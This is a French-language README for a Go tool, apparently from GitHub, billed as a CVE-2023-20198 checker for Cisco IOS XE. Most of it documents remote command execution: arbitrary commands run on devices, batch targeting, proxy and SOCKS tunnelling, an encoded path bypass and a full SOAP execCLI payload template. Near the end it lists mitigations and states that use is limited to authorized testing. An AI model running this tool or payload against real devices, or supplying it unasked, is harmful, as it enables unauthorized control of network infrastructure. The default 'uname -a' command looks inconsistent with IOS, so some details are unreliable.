
Scanneur de vulnérabilités basé sur Go pour la détection de CVE-2023-20198 sur les appareils Cisco IOS XE. Teste les interfaces SOAP/XML (WSMA) pour l'exécution de code à distance avec analyse par lots et génération de rapports HTML.
Un scanner de vulnérabilités professionnel pour détecter CVE-2023-20198 sur les appareils Cisco IOS XE. Teste les interfaces SOAP/XML vulnérables (WSMA). Conçu pour les évaluations de sécurité autorisées et l'audit réseau.
POUR TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT
Cet outil est destiné exclusivement à :
L'accès non autorisé aux systèmes informatiques est ILLÉGAL. Assurez-vous toujours d'avoir l'autorisation appropriée avant de tester tout système.
go install (Recommandé)go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest
Le binaire sera installé dans votre répertoire $GOPATH/bin (généralement ~/go/bin).
# Cloner le dépôt
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker
# Compiler
go build -o cisco-cve-2023-20198-checker
# Installer (optionnel)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/
# Vérifier une seule cible
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# Vérifier plusieurs cibles
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin
# Générer un rapport HTML
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html
Parfait pour les environnements d'entreprise ! Prend en charge :
# Proxy HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 (tunnel SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# Variable d'environnement
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin
Voir PROXY_GUIDE.md pour une configuration détaillée des proxys.
| Option | Type | Défaut | Description |
|---|---|---|---|
-target | string | - | IP/nom d'hôte de la cible unique |
-targets-file | string | - | Fichier contenant les cibles (une par ligne) |
-port | int | 443 | Port HTTPS/SOAP |
-username | string | admin | Nom d'utilisateur SOAP |
-password | string | - | Requis. Mot de passe SOAP |
-command | string | uname -a | Commande à exécuter |
-html | bool | false | Générer un rapport HTML |
-timeout | int | 10 | Délai d'attente de la requête (secondes) |
-skip-verify | bool | true | Ignorer la vérification SSL |
-proxy | string | - | URL du proxy (http://, https://, socks5://) |
# Vérification de vulnérabilité de base
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# Port personnalisé
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret
# Exécuter une commande spécifique
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# Générer un rapport
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html
# Créer un fichier de cibles
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF
# Tester toutes les cibles
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123
# Lot avec rapport HTML
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html
# Énumération réseau
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show ip interface brief"
# Détection de version
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# Via proxy HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# Via proxy SOCKS5 (tunnel SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# Proxy authentifié
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://user:[email protected]:8080
Identifiant CVE : CVE-2023-20198
Score CVSS : 10.0 (Critique)
Type : Exécution de code à distance (RCE)
Affecté : Interface Web Cisco IOS XE (WSMA)
/%2577ebui_wsma_https (contournement d'encodage de chemin)urn:cisco:wsma-exec<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password>password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request xmlns="urn:cisco:wsma-exec">
<execCLI>
<cmd>COMMAND_HERE</cmd>
</execCLI>
</request>
</SOAP:Body>
</SOAP:Envelope>
Si vos appareils sont vulnérables :
1. Désactiver WSMA (si non requis)
no ip http server
no ip http secure-server
2. Restreindre l'accès avec des ACL
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
permit 10.0.0.0 0.0.0.255
deny any log
3. Mettre à jour le firmware - Appliquer les derniers correctifs de sécurité Cisco
4. Activer une authentification forte
aaa new-model
aaa authentication login default group tacacs+ local
5. Surveiller les journaux - Rechercher toute activité SOAP/HTTP suspecte
# Compilation standard
go build -o cisco-cve-2023-20198-checker
# Optimisé (binaire plus petit)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker